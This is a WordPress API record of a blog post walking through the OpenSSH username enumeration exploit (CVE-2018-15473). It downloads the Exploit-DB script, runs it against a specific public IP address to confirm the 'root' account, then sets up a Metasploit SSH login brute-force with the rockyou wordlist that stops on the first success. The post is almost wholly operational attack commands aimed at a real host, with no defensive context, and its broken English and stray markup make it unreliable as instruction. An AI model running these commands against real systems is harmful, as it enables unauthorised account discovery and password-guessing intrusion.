{"id":1050,"date":"2021-04-02T04:56:21","date_gmt":"2021-04-01T20:56:21","guid":{"rendered":"https:\/\/byy3.com\/?p=1050"},"modified":"2021-04-02T05:35:41","modified_gmt":"2021-04-01T21:35:41","slug":"openssh-2-3-to-7-7-username-enumeration-exploit","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=1050","title":{"rendered":"OpenSSH 2.3 to 7.7 – Username Enumeration Exploit"},"content":{"rendered":"

OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)<\/h1>\n

username get guess with openssh 22 port<\/p>\n

https:\/\/www.exploit-db.com\/exploits\/45210<\/p>\n

\n
\n
\n
\n
\n
\n
\n

EDB-ID:<\/h4>\n

45210<\/h6>\n<\/div>\n
\n

CVE:<\/h4>\n

2018-15473<\/a><\/h6>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n
\n
EDB Verified:<\/strong>\u00a0<\/i><\/div>\n<\/div>\n<\/div>\n<\/div>\n
\n
\n
\n
\n
\n
\n
\n

Author:<\/h4>\n

MATTHEW DALEY<\/a><\/h6>\n<\/div>\n
\n

Type:<\/h4>\n

REMOTE<\/a><\/h6>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n
\n
Exploit: <\/strong><\/i>\u00a0<\/a>\u00a0 \/ \u00a0\u00a0<\/i><\/div>\n<\/div>\n<\/div>\n<\/div>\n
\n
\n
\n
\n
\n
\n
\n

Platform:<\/h4>\n

LINUX<\/a><\/h6>\n<\/div>\n
\n

Date:<\/h4>\n

2018-08-16<\/h6>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n
\n
Vulnerable App:<\/strong><\/div>\n
\n

1, get down<\/p>\n<\/div>\n

wget https:\/\/www.exploit-db.com\/download\/45210<\/div>\n
mv 45210 45210.py<\/div>\n<\/div>\n
chmod +x 45210.py<\/div>\n
python 45210.py --port 22 47.242.58.57 root<\/div>\n
if proble run with python2 must $ pip3\u00a0 install\u00a0 2to3<\/div>\n
pip3 install --upgrade paramiko==2.4.1<\/div>\n
python3 45210.py --port 22 47.242.58.** root<\/div>\n
(root) is guess username<\/div>\n
msfconsole<\/div>\n
search ssh<\/div>\n
use auxiliary\/scanner\/ssh\/ssh_login<\/div>\n
set rhost 47.242.58.**<\/div>\n
set username root<\/div>\n
set threads 55<\/div>\n
set stop_on_success true<\/div>\n
set pass_file \/usr\/share\/wordlists\/rockyou.txt<\/div>\n
show options<\/div>\n
run<\/div>\n
\/\/<\/div>\n<\/div>\n
open other terminal $ locate rockyou<\/div>\n
gunzip \/usr\/share\/wordlists\/rockyou.txt.gz<\/div>\n
\/\/<\/div>\n
\"OpenSSH<\/div>\n","protected":false},"excerpt":{"rendered":"

OpenSSH 2.3 < 7.7 – Username Enumeration (PoC) usern […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[611,610,609,608,607],"class_list":["post-1050","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-enumeration","tag-exploit","tag-openssh","tag-vuln","tag-vulnerable"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1050","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1050"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1050\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1050"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1050"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1050"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}